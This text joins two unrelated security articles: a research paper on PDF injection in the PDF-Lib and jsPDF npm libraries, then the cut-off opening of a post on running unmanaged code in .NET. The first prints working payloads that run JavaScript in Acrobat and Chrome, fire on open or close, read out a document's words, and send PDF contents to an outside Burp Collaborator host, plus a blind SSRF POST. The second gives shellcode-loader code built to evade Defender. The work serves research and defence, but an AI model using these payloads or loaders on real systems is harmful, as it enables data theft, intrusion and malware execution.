I tried around 8 different libraries while conducting this research. Of these, I found two that were vulnerable to PDF injection: PDF-Lib and jsPDF, both of which are npm modules. PDF-Lib has over 52k weekly downloads and jsPDF has over 250k. Each library seems to correctly escape text streams but makes the mistake of allowing PDF injection inside annotations. Here is an example of how you create annotations in PDF-Lib:

const linkAnnotation = pdfDoc.context.obj({
  Type: 'Annot',
  Subtype: 'Link',
  Rect: [50, height - 95, 320, height - 130],
  Border: [0, 0, 2],
  C: [0, 0, 1],
  A: {
    Type: 'Action',
    S: 'URI',
    URI: PDFString.of(`/input`), //vulnerable code
  }
})

As you can see in the code sample, PDF-Lib has a helper function to generate PDF strings, but it doesn’t escape parentheses. So if a developer places user input inside a URI, an attacker can break out and inject their own PDF code. The other library, jsPDF, has the same problem, but this time in the url property of their annotation generation code:

var doc = new jsPDF();
doc.text(20, 20, 'Hello world!');
doc.addPage('a6','l');
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:'/input'}); //vulnerable code

Exploiting injections

Before I demonstrate the vectors I found, I’m going to walk you through the journey I took to find them. First, I’ll talk about how I tried executing JavaScript and stealing the contents of the PDF from an injection. I’ll show you how I solved the problem of tracking and exfiltrating a PDF when opened from the filesystem on Acrobat, as well as how I was able to execute annotations without requiring user interaction. After that I’ll discuss why these injections fail on Chrome and how to make them work. I hope you will enjoy my journey of exploiting injections.

Acrobat

The first step was to test a PDF library, so I downloaded PDFKit, created a bunch of test PDFs, and looked at the generated output. The first thing that stood out was text objects. If you have an injection inside a text stream then you can break out of the text using a closing parenthesis and inject your own PDF code.

A PDF text object looks like the following:

Diagram of a PDF text stream

BT indicates the start of a text object, /F13 sets the font, 12 specifies the size, and Tf is the font resource operator (it’s worth noting that in PDF code, the operators tend to follow their parameters).

The numbers that follow Tf are the starting position on the page; the Td operator specifies the position of the text on the page using those numbers. The opening parenthesis starts the text that’s going to be added to the page, “ABC” is the actual text, then the closing parenthesis finishes the text string. Tj is the show text operator and ET ends the text object.
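Assembled as raw PDF code (coordinates illustrative), the text object described above reads:

```
BT
/F13 12 Tf
288 720 Td
(ABC) Tj
ET
```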

Controlling the characters inside the parentheses could enable us to break out of the text string and inject PDF code.

I tried all the techniques mentioned in my methodology with PDFKit, PDF Make, and FPDF, and got nowhere. At this point, I parked the research and did something else for a while. I often do this if I reach a dead-end; it’s no good wasting time on research that is going nowhere. I find coming back to it later with a fresh mind helps a lot. Being persistent is great, but don’t fall into the trap of being repetitive without results.

PDF-Lib

With a fresh mind, I picked up the research again and decided to study the PDF specification. Just like XSS, PDF injections can occur in different contexts. So far, I’d only looked at text streams, but sometimes user input might get placed inside links. Annotations stood out to me because they allow developers to create anchor-like links on PDF text and objects. By now I was on my fourth PDF library. This time, I was using PDF-Lib. I took some time to use the library to create an annotation and see if I could inject a closing parenthesis into the annotation URI, and it worked! The sample vulnerable code I used to generate the annotation code was:

...
A: {
    Type: 'Action',
    S: 'URI',
    URI: PDFString.of(`injection)`),
  }
  })
...

Full code:

How did I know the injection was successful? The PDF would render correctly unless I injected a closing parenthesis, which proved that the closing parenthesis was breaking out of the string and causing invalid PDF code. Breaking the PDF was nice, but of course I needed to ensure I could execute JavaScript. I looked at the rendered PDF code and noticed the output was being encoded using the FlateDecode filter, so I wrote a little script to deflate the block. The output of the annotation section looked like this:

<<
/Type /Annot
/Subtype /Link
/Rect [ 50 746.89 320 711.89 ]
/Border [ 0 0 2 ]
/C [ 0 0 1 ]
/A <<
/Type /Action
/S /URI
/URI (injection))
>>
>>

As you can see, the injected string closes the text boundary with its own parenthesis, leaving the existing closing parenthesis dangling and causing the PDF to render incorrectly:

Screenshot showing an error dialog when loading the PDF

Great, so I could break the rendering of the PDF. Now what? I needed to come up with an injection that called some JavaScript: the alert(1) of PDF injection.

Just like how XSS vectors depend on the browser’s parsing, PDF injection exploitability can depend on the PDF renderer. I decided to start by targeting Acrobat because I thought the vectors were less likely to work in Chrome. I noticed two things: 1) you could inject additional annotation actions, and 2) if you repair the existing closing parenthesis then the PDF will render. After some experimentation, I came up with a nice payload that injected an additional annotation action, executed JavaScript, and repaired the closing parenthesis:

/blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action>>/>>(

First I break out of the parenthesis, then break out of the dictionary using >> before starting a new annotation dictionary. The /S/JavaScript entry makes the annotation JavaScript-based, and /JS is where the JavaScript is stored. Inside the parentheses is our actual JavaScript. Note that you don’t have to escape the parentheses if they’re balanced. Finally, I add the type of annotation, finish the dictionary, and repair the closing parenthesis. This was so cool; I could craft an injection that executed JavaScript, but so what, right? You can execute JavaScript but you don’t have access to the DOM, so you can’t read cookies. Then James popped up and suggested stealing the contents of the PDF from the injection. I started looking at ways to get the contents of a PDF. In Acrobat, I discovered that you can use JavaScript to submit forms without any user interaction! Looking at the spec for the JavaScript API, it was pretty straightforward to modify the base injection and add some JavaScript that would send the entire contents of the PDF code to an external server in a POST request:

/blah)>>/A<</S/JavaScript/JS(app.alert(1);
this.submitForm({
cURL: 'https://your-id.burpcollaborator.net',cSubmitAs: 'PDF'}))
/Type/Action>>/>>(

The alert is not needed; I just added it to prove the injection was executing JavaScript.

Next, just for fun, I looked at stealing the contents of the PDF without using JavaScript. From the PDF specification, I found out that you can use an action called SubmitForm. I had used this in the past when constructing a PDF for a scan check in Burp Suite, and it does exactly what the name implies. It also has a Flags entry in the dictionary to control what is submitted. The Flags dictionary key accepts a single integer value, but each individual setting is controlled by a binary bit. A good way to work with these settings is to use the binary literals introduced in ES6. The binary literal should be 14 bits long because there are 14 flags in total. In the following example, all of the settings are disabled:

0b00000000000000

To set a flag, you first need to look up its bit position (table 237 of the PDF specification). In this case, we want to set the SubmitPDF flag. As this is controlled by the 9th bit, you just need to count 9 bits from the right:

0b00000100000000

If you evaluate this with JavaScript, it results in the decimal value 256. In other words, setting the Flags entry to 256 enables the SubmitPDF flag, which causes the contents of the PDF to be sent when submitting the form. All we need to do is take the base injection we created earlier and modify it to call the SubmitForm action instead of JavaScript:

/blah)>>/A<</S/SubmitForm/Flags 256/F(
https://your-id.burpcollaborator.net)
/Type/Action>>/>>(
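The bit arithmetic above is easy to check in JavaScript using ES6 binary literals; a quick sketch:

```javascript
// all 14 SubmitForm flags cleared
const noFlags = 0b00000000000000;

// SubmitPDF is controlled by the 9th bit, counting from the right,
// which is the same as shifting 1 left by 8 places
const submitPdf = 0b00000100000000;

console.log(noFlags);   // 0
console.log(submitPdf); // 256
```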

jsPDF

Next I applied my methodology to another PDF library, jsPDF, and found it was vulnerable too. Exploiting this library was quite fun because it has an API that can execute in the browser and will generate the PDF in real time as you type. I noticed that, like PDF-Lib, it forgot to escape parentheses inside annotation URLs. Here the url property was vulnerable:

doc.createAnnotation({bounds:
{x:0,y:10,w:200,h:200},
type:'link',url:`/input`});
//vulnerable

So I generated a PDF using their API and injected PDF code into the url property:

var doc = new jsPDF();
doc.text(20, 20, 'Hello world!');
doc.addPage('a6','l');
doc.createAnnotation({bounds:
{x:0,y:10,w:200,h:200},type:'link',url:`
/blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action/F 0/(
`});

I reduced the vector by removing the type entries of the dictionary and the unneeded F entry, then left a dangling parenthesis that would be closed by the existing one. Reducing the size of the injection is important because the web application you are injecting into might only allow a limited number of characters.

/blah)>>/A<</S/JavaScript/JS(app.alert(1)

I then worked out that it was possible to reduce the vector even further! Acrobat would allow a URI and a JavaScript entry within one annotation action and would happily execute the JavaScript:

/)/S/JavaScript/JS(app.alert(1)

Further research revealed that you can also inject multiple annotations. This means that instead of just injecting an action, you can break out of the annotation and define your own rect coordinates to choose which section of the document is clickable. Using this technique, I was able to make the entire document clickable:

/) >> >>
<</Type /Annot /Subtype /Link /Rect [0.00 813.54 566.93 -298.27] /Border [0 0
0] /A <</S/SubmitForm/Flags 0/F(https://your-id.burpcollaborator.net

Writing an enumerator

The next stage was to look at how Acrobat handles PDFs that are loaded from the filesystem, rather than served directly from a website. In this case, there are more restrictions in place. For example, when you try to submit a form to an external URL, a prompt is triggered and the user has to manually confirm that they want to submit the form. To get around these restrictions, I wrote an enumerator/fuzzer that calls every function on every object to see if any of them would allow me to contact an external server without user interaction.

var doc = new jsPDF();
doc.text(20, 20, 'Hello world!');
doc.addPage('a6','l');
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<</S/JavaScript/JS(
    ...
    for(i in obj){
        try {
            if(i==='console' || i === 'getURL' || i === 'submitForm'){
                continue;
            }
            if(typeof obj[i] != 'function') {
                console.println(i+'='+obj[i]);
            }
            try {
                console.println('call:'+i+'=>'+'='+obj[i]('http://your-id-'+i+'.burpcollaborator.net?'+i,2,3));
...

Full code

The enumerator first runs a for loop on the global object “this”. I skipped the getURL and submitForm methods and the console object because I knew that they cause prompts and do not allow you to contact external servers unless you click allow. Try-catch blocks are used to prevent the loop from failing if an exception is thrown because the function can’t be called or the property isn’t a valid function. Burp Collaborator is used to see whether the server was contacted successfully; I add the key being checked to the subdomain so that Collaborator will show which property allowed the interaction.

Using this fuzzer, I discovered a method that can be called that contacts an external server: CBSharedReviewIfOfflineDialog will cause a DNS interaction without requiring the user to click allow. You could then use DNS to exfiltrate the contents of the PDF or other information. However, this still requires a click since our injection uses an annotation action.

Executing annotations without interaction

So far, the vectors I’ve demonstrated require a click to activate the action from the annotation. Naturally, James asked the question: “Can we execute automatically?” I looked through the PDF specification and noticed some interesting features of annotations:

“The PV and PI entries allow a distinction between pages that are open and pages that are visible. At any one time, only a single page is considered open in the viewer application, while more than one page may be visible, depending on the page layout.”

We can add the PV entry to the dictionary and the annotation will fire on Acrobat automatically! Not only that, but we can also execute a payload automatically when the PDF document is closed, using the PC entry. An attacker could track you both when you open the PDF and when you close it.

Here’s how to execute automatically from an annotation:

var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/)
>> >>
<</Subtype /Screen /Rect [0 0 900 900] /AA <</PV <</S/JavaScript/JS(app.alert(1))>>/(`});
doc.text(20, 20, 'Auto execute');

When you close the PDF, this annotation will fire:

var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>
<</Subtype /Screen /Rect [0 0 900 900] /AA <</PC <</S/JavaScript/JS(app.alert(1))>>/(`});
doc.text(20, 20, 'Close me');

Chrome

I’ve talked a lot about Acrobat, but what about PDFium (Chrome’s PDF reader)? Chrome is tricky; the attack surface is much smaller because its JavaScript support is more limited than Acrobat’s. The first thing I noticed was that JavaScript wasn’t being executed in annotations at all, so my proofs of concept weren’t working. To get the vectors working in Chrome, I needed to at least execute JavaScript inside annotations. First though, I decided to try to overwrite a URL in an annotation. This was pretty easy: I could use the base injection I came up with before and simply inject another action with a URI entry that would overwrite the existing URL:

var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<</S/URI/URI(https://portswigger.net)
/Type/Action>>/F 0>>(`});
doc.text(20, 20, 'Test text');

This would navigate to portswigger.net when clicked. I then moved on and tried different injections to call JavaScript, but they failed every time; I thought it was impossible to do. I took a step back and tried to manually construct an entire PDF that would call JavaScript from a click in Chrome without an injection. When using an AcroForm button, Chrome would allow JavaScript execution, but the problem was that it required references to other parts of the PDF. Eventually, I managed to craft an injection that would execute JavaScript from a click on jsPDF:

var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0.825 0.8275 0.8275]/CA(Submit)>>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<</N <</Type/XObject/BBox[ 0 0 72 21.6]/Subtype/Form>>>>/Parent <</Kids[ 3 0 R]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(app.alert(1))/Type/Action/F 4/DA(blah`});
doc.text(20, 20, 'Click me test');

As you can see, the above vector requires knowledge of the PDF structure: [ 3 0 R] refers to a specific PDF object, and if we were doing a blind PDF injection attack, we wouldn’t know its structure. Still, the next stage is to try a form submission. We can use the submitForm function for this, and because the annotation requires a click, Chrome will allow it:

/) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0.0 813.54 566.93 -298.27]/CA(Submit)>>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<</N <</Type/XObject/BBox[ 0 0 72 21.6]/Subtype/Form>>>>/Parent <</Kids[ 3 0 R]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(app.alert(1);this.submitForm('https://your-id.burpcollaborator.net'))/Type/Action/F 4/DA(blah

This works, but it’s messy and requires knowledge of the PDF structure. We can reduce it a lot and remove the reliance on the PDF structure:

#) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0 0 889 792]/CA(Submit)>>/Rect [ 0 0 889 792]/Subtype/Widget/AP<</N <</Type/XObject/Subtype/Form>>>>/Parent <</Kids[ ]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(
    app.alert(1)
    )/Type/Action/F 4/DA(blah

There’s still some code we can remove:

var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>>>><</Type/Annot/Rect[ 0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(A)>>/A<</S/JavaScript/JS(app.alert(1))/(`});
doc.text(20, 20, 'Test text');

The code above breaks out of the annotation, creates a new one, and makes the entire page clickable. In order for the JavaScript to execute, we have to inject a button and give it some text using the “T” entry. We can then finally inject our JavaScript code using the JS entry in the dictionary. Executing JavaScript on Chrome is great; I never thought it would be possible when I started this research.

Next I looked at the submitForm function to steal the contents of the PDF. We know that we can call the function and that it contacts an external server, as demonstrated in one of the examples above, but does it support the full Acrobat specification? I looked at the source code of PDFium, but the function doesn’t support SubmitAsPDF 🙁 You can see it supports FDF, but unfortunately this doesn’t submit the contents of the PDF. I looked for other ways, but I didn’t know what objects were available, so I took the same approach I did with Acrobat and wrote a fuzzer/enumerator to find interesting objects. Getting information out of Chrome was more difficult than Acrobat: because the alert function truncates the string sent to it, I had to gather information in chunks before outputting it.

...
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(
(function(){
var obj = this,
    data = '',
    chunks = [],
    counter = 0,
    added = false, i, props = [];
    for(i in obj) {
        props.push(i);
    }
...

Full code
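The chunking trick can be sketched outside a PDF as plain JavaScript (the chunk size and sample string here are arbitrary assumptions; the real enumerator gathers property dumps rather than a fixed string):

```javascript
// app.alert truncates long strings, so the enumerator output is split into
// chunks and alerted one piece at a time
function chunkString(str, size) {
  const chunks = [];
  for (let i = 0; i < str.length; i += size) {
    chunks.push(str.slice(i, i + size));
  }
  return chunks;
}

console.log(chunkString('propA=1;propB=2;propC=3;', 8));
```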

Inspecting the output of the enumerator, I tried calling various functions in the hope of making external requests or gathering information from the PDF. Eventually, I found a very interesting function called getPageNthWord, which could extract words from the PDF document, thereby allowing me to steal its contents. The function has a subtle bug where the first word sometimes will not be extracted, but for the most part it extracts the majority of words:

var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(
words = [];
for(page=0;page<this.numPages;page++) {
    for(wordPos=0;wordPos<this.getPageNumWords(page);wordPos++) {
        word = this.getPageNthWord(page, wordPos, true);
        words.push(word);
    }
}
app.alert(words);
    `});
doc.text(20, 20, 'Click me test');
doc.text(20, 40, 'Abc Def');
doc.text(20, 60, 'Some word');

I was pretty pleased with myself that I could steal the contents of the PDF on Chrome, as I never thought this would be possible. Combining this with the submitForm vector would enable you to send the data to an external server. The only downside is that it requires a click. I wondered if you could get JavaScript execution without a click on Chrome. Looking at the PDF specification again, I noticed another entry in the annotation dictionary called “E”, which will execute the annotation when the mouse enters the annotation area: basically a mouseover event. Unfortunately, this does not count as user interaction for the purposes of enabling a form submission. So although you can execute JavaScript, you can’t do anything with the data because you can’t send it to an external server. If you can get Chrome to submit data with this event, please let me know, because I’d be very interested to hear how. Anyway, here is the code to trigger a mouseover action:

var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>
<</Type /Annot /Subtype /Widget /Parent<</FT/Btn/T(a)>> /Rect [0 0 900 900] /AA <</E <</S/JavaScript/JS(app.alert(1))>>/(`});
doc.text(20, 20, 'Test');

SSRF in PDFium/Acrobat

It’s possible to send a POST request with PDFium/Acrobat to perform an SSRF attack. This would be a blind SSRF, since you can make a POST request but can’t read the response. To construct a POST request, you can use the /Parent dictionary key as demonstrated earlier to assign a form element to the annotation, enabling JavaScript execution. But instead of using a button like we did before, you can assign a text field (/Tx) with the parameter name (/T) and parameter value (/V) dictionary keys. Notice how you have to pass the parameter names you want to use to the submitForm function as an array:

#)>>>><</Type/Annot/Rect[ 0 0 900 900]/Subtype/Widget/Parent<</FT/Tx/T(foo)/V(bar)>>/A<</S/JavaScript/JS(
app.alert(1);
this.submitForm('https://aiws4u6uubgfdag94xvc5wbrfilc91.burpcollaborator.net', false, false, ['foo']);
)/(

You can even send raw new lines, which could be useful when chaining other attacks such as request smuggling. The result of the POST request can be seen in the following Collaborator request:

Screen shot showing a Burp Collaborator request from a PDF

Finally, I want to finish with a hybrid Chrome and Acrobat PDF injection. The first part injects JavaScript into the existing annotation to execute JavaScript on Acrobat. The second part breaks out of the annotation and injects a new annotation that defines a new clickable area for Chrome. I use the AcroForm trick again to inject a button so that the JavaScript will execute:

var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)/S/JavaScript/JS(app.alert(1))/Type/Action>> >> <</Type/Annot/Rect[0 0 900 700]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(app.alert(1)`});
doc.text(20, 20, 'Click me Acrobat');
doc.text(20, 60, 'Click me Chrome');

PDF upload “formcalc” technique

While conducting this research, I encountered an HR application that allowed PDF documents to be uploaded. The application didn’t validate the PDF, which allowed arbitrary JavaScript to be embedded in the file. I remembered a fantastic technique by @InsertScript that lets you make requests from a PDF file to read same-origin resources using formcalc.

I tried this attack but it failed because the WAF was blocking requests from the Acrobat user agent. Then I tried cached resources and discovered this would be completely missed by the WAF — it would never see a request because the resource was loaded through the cache. I attempted to use this technique with PDF injection but, unfortunately, I couldn’t figure out a way of injecting formcalc or calling formcalc from JavaScript without using the AcroForm dictionary key in the trailer. If anyone manages to do this then please get in touch because I’d be super interested.

Defence

If you are writing a PDF library, it’s recommended that you escape parentheses and backslashes when accepting user input within text streams or annotation URIs. As a developer, you can use the injections mentioned in this paper to confirm that any user input doesn’t cause PDF injection. Consider performing validation on any content going into PDFs to ensure you can’t inject PDF code.
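As a sketch of what that escaping might look like (a hypothetical helper, not taken from any of the libraries discussed), note that backslashes must be escaped first so that the escapes added for the parentheses are not themselves doubled:

```javascript
// escape the characters that terminate or alter a PDF literal string:
// the backslash first, then the parentheses that delimit the string
function escapePdfString(input) {
  return input
    .replace(/\\/g, '\\\\')
    .replace(/\(/g, '\\(')
    .replace(/\)/g, '\\)');
}

console.log(escapePdfString('injection)')); // injection\)
```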

Conclusion

  • Vulnerable libraries can make user input inside PDFs dangerous by not escaping parentheses and backslashes.
  • A clear objective helps when tackling seemingly impossible problems and persistence pays off when trying to achieve those goals.
  • One simple link can compromise the entire contents of an unknown PDF.

Example files

You can download all the injection examples in this whitepaper at:

https://github.com/PortSwigger/portable-data-exfiltration/tree/main/PDF-research-samples

Acknowledgements

I knew nothing about the structure of PDFs until I watched a talk about building your own PDF manually by Ange Albertini. He is a great inspiration to me and without his learning materials this post would never have been made. I’d also like to credit Alex «InsertScript» Inführ, who covered PDFs in his mess with the web presentation. It blew everyone’s mind when he demonstrated how much a PDF was able to do. Thank you to both of you. I’d also like to thank Ben Sadeghipour & Cody Brocious for the idea of performing a SSRF attack from a PDF in their excellent presentation.

Addendum

Adobe has released a patch which addresses the CBSharedReviewIfOfflineDialog information disclosure.

Weird Ways to Run Unmanaged Code in .NET

Original text by Adam Chester

Ever since the release of the .NET framework, the offensive security industry has spent a considerable amount of time crafting .NET projects to accommodate unmanaged code. Usually this comes in the form of a loader, wrapping payloads like Cobalt Strike beacon and invoking executable memory using a few P/Invoke imports. But with endless samples being studied by defenders, the process of simply dllimport’ing Win32 APIs has become more of a challenge, giving rise to alternate techniques such as D/Invoke.

Recently I have been looking at the .NET Common Language Runtime (CLR) internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snippet of some of the weird techniques that I found.

The samples in this post will focus on .NET 5.0 executing x64 binaries on Windows. The decision by Microsoft to unify .NET means that moving forwards we are going to be working with a single framework rather than the current fragmented set of versions we’ve been used to. That being said, all of the areas discussed can be applied to earlier versions of the .NET framework, other architectures and operating systems… let’s get started.

A Quick History Lesson

What are we typically trying to achieve when executing unmanaged code in .NET? Often, as Red Teamers, we are looking to do something like running a raw beacon payload, where native code is executed from within a C# wrapper.

For a long time, the most common way of doing this looked something like:

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

[DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

public static void StartShellcode(byte[] shellcode)
{
    uint threadId;

    IntPtr alloc = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
    if (alloc == IntPtr.Zero) {
        return;
    }

    Marshal.Copy(shellcode, 0, alloc, shellcode.Length);
    IntPtr threadHandle = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out threadId);
    WaitForSingleObject(threadHandle, 0xFFFFFFFF);
}

And all was fine; however, it did not take long before defenders realised that a .NET binary referencing a bunch of suspicious methods provided a good indicator that the binary warranted further investigation:

And as an example of the obvious indicators that these imported methods yield, you will see that if you try and compile the above example on a machine protected by Defender, Microsoft will pop up a nice warning that you’ve just infected yourself with VirTool:MSIL/Viemlod.gen!A.

So with these detections throwing a spanner in the works, techniques of course evolved. One such evolution of unmanaged code execution came from the awesome research completed by @fuzzysec and @TheRealWover, who introduced the D/Invoke technique. If we exclude the project’s DLL loader for the moment, the underlying technique used by D/Invoke to transition from managed to unmanaged code is facilitated by a crucial method, Marshal.GetDelegateForFunctionPointer. If we look at the documentation, Microsoft tells us that this method “Converts an unmanaged function pointer to a delegate”. This gets around the fundamental problem of exposing those nasty imports, forcing defenders to go beyond the ImplMap table. A simple example of how we might use Marshal.GetDelegateForFunctionPointer to execute unmanaged code within an x64 process would be:

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr VirtualAllocDelegate(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr ShellcodeDelegate();

public static IntPtr GetExportAddress(IntPtr baseAddr, string name)
{
    var dosHeader = Marshal.PtrToStructure<IMAGE_DOS_HEADER>(baseAddr);
    var peHeader = Marshal.PtrToStructure<IMAGE_OPTIONAL_HEADER64>(baseAddr + dosHeader.e_lfanew + 4 + Marshal.SizeOf<IMAGE_FILE_HEADER>());
    var exportHeader = Marshal.PtrToStructure<IMAGE_EXPORT_DIRECTORY>(baseAddr + (int)peHeader.ExportTable.VirtualAddress);

    for (int i = 0; i < exportHeader.NumberOfNames; i++)
    {
        var nameAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfNames + (i * 4));
        var m = Marshal.PtrToStringAnsi(baseAddr + (int)nameAddr);
        if (m == "VirtualAlloc")
        {
            var exportAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfFunctions + (i * 4));
            return baseAddr + (int)exportAddr;
        }
    }

    return IntPtr.Zero;
}

public static void StartShellcodeViaDelegate(byte[] shellcode)
{
    IntPtr virtualAllocAddr = IntPtr.Zero;

    foreach (ProcessModule module in Process.GetCurrentProcess().Modules)
    {
        if (module.ModuleName.ToLower() == "kernel32.dll")
        {
            virtualAllocAddr = GetExportAddress(module.BaseAddress, "VirtualAlloc");
        }
    }

    var VirtualAlloc = Marshal.GetDelegateForFunctionPointer<VirtualAllocDelegate>(virtualAllocAddr);
    var execMem = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);

    Marshal.Copy(shellcode, 0, execMem, shellcode.Length);

    var shellcodeCall = Marshal.GetDelegateForFunctionPointer<ShellcodeDelegate>(execMem);
    shellcodeCall();
}

So, with these methods out in the wild, are there any other techniques that we have available to us?

Targeting What We Cannot See

One of the areas hidden from casual .NET developers is the underlying CLR itself. Thankfully, Microsoft releases the source code for the CLR on GitHub, giving us a peek into how this beast actually operates.

Let’s start by looking at a very simple application:

using System;
using System.Runtime.InteropServices;

namespace Test
{
    public class Test
    {
        public static void Main(string[] args)
        {
            var testObject = "XPN TEST";
            GCHandle handle = GCHandle.Alloc(testObject);
            IntPtr parameter = (IntPtr)handle;
            Console.WriteLine("testObject at addr: {0}", parameter);
            Console.ReadLine();
        }
    }
}

Once we have this compiled, we can attach WinDBG to gather some information on the internals of the CLR during execution. We’ll start with the pointer outputted by this program and use the !dumpobj command provided by the SOS extension to reveal some information on what the memory address references:

As expected, we see that this memory points to a System.String .NET object, and we find the addresses of various associated fields available to us. The first class that we are going to look at is MethodTable, which represents a .NET class or interface to the CLR. We can inspect this further with a WinDBG helper method of !dumpmt [ADDRESS]:

We can also dump a list of methods associated with the System.String .NET class with !dumpmt -md [ADDRESS]:

So how are the System.String .NET methods found relative to a MethodTable? Well according to what has become a bit of a bible of .NET internals for me, we need to study the EEClass class. We can do this using dt coreclr!EEClass [ADDRESS]:

Again, we see several fields, but of interest to identifying associated .NET methods is the m_pChunks field, which references a MethodDescChunk object consisting of a simple structure:

Appended to a MethodDescChunk object is an array of MethodDesc objects, which represent .NET methods exposed by the .NET class (in our case System.String). Each MethodDesc is aligned to 18 bytes when running within a x64 process:

To retrieve information on this method, we can pass the address over to the !dumpmd helper command which tells us that the first .NET method of our System.String is System.String.Replace:

Now before we continue, it’s worth giving a quick insight into how the JIT compilation process works when executing a method from .NET. As I’ve discussed in previous posts, the JIT process is “lazy” in that a method won’t be JIT’ed up front (with some exceptions which we won’t cover here). Instead compilation is deferred to first use, by directing execution via the coreclr!PrecodeFixupThunk method, which acts as a trampoline to compile the method:

Once a method is executed, the native code is JIT’ed and this trampoline is replaced with a JMP to the actual compiled code.

So how do we find the pointer to this trampoline? Usually this pointer lives in a slot located within a vector following the MethodTable, which is in turn indexed by the m_wSlotNumber of the MethodDesc object. But in some cases, this pointer immediately follows the MethodDesc object itself, as a so-called “Local Slot”. We can tell if this is the case by looking at the m_wFlags member of the MethodDesc object for a method, and seeing if the following flag has been set:

If we dump the memory for our MethodDesc, we can see this pointer being located immediately after the object:

OK with our knowledge of how the JIT process works and some idea of how the memory layout of a .NET method looks in unmanaged land, let’s see if we can use this to our advantage when looking to execute unmanaged code.

Hijacking JIT Compilation to Execute Unmanaged Code

To execute our unmanaged code, we need to gain control over the RIP register, which, now that we understand how execution flows via the JIT process, should be relatively straightforward.

To do this we will define a few structures which will help us to follow along and demonstrate our POC code a little more clearly. Let’s start with a MethodTable:

[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
    [FieldOffset(0)]
    public uint m_dwFlags;

    [FieldOffset(0x4)]
    public uint m_BaseSize;

    [FieldOffset(0x8)]
    public ushort m_wFlags2;

    [FieldOffset(0x0a)]
    public ushort m_wToken;

    [FieldOffset(0x0c)]
    public ushort m_wNumVirtuals;

    [FieldOffset(0x0e)]
    public ushort m_wNumInterfaces;

    [FieldOffset(0x10)]
    public IntPtr m_pParentMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pLoaderModule;

    [FieldOffset(0x20)]
    public IntPtr m_pWriteableData;

    [FieldOffset(0x28)]
    public IntPtr m_pEEClass;

    [FieldOffset(0x30)]
    public IntPtr m_pPerInstInfo;

    [FieldOffset(0x38)]
    public IntPtr m_pInterfaceMap;
}

Then we will also require an EEClass:

[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
    [FieldOffset(0)]
    public IntPtr m_pGuidInfo;

    [FieldOffset(0x8)]
    public IntPtr m_rpOptionalFields;

    [FieldOffset(0x10)]
    public IntPtr m_pMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pFieldDescList;

    [FieldOffset(0x20)]
    public IntPtr m_pChunks;
}

Next we need our MethodDescChunk:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
    [FieldOffset(0)]
    public IntPtr m_methodTable;

    [FieldOffset(8)]
    public IntPtr m_next;

    [FieldOffset(0x10)]
    public byte m_size;

    [FieldOffset(0x11)]
    public byte m_count;

    [FieldOffset(0x12)]
    public byte m_flagsAndTokenRange;
}

And finally a MethodDesc:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
    [FieldOffset(0)]
    public ushort m_wFlags3AndTokenRemainder;

    [FieldOffset(2)]
    public byte m_chunkIndex;

    [FieldOffset(0x3)]
    public byte m_bFlags2;

    [FieldOffset(0x4)]
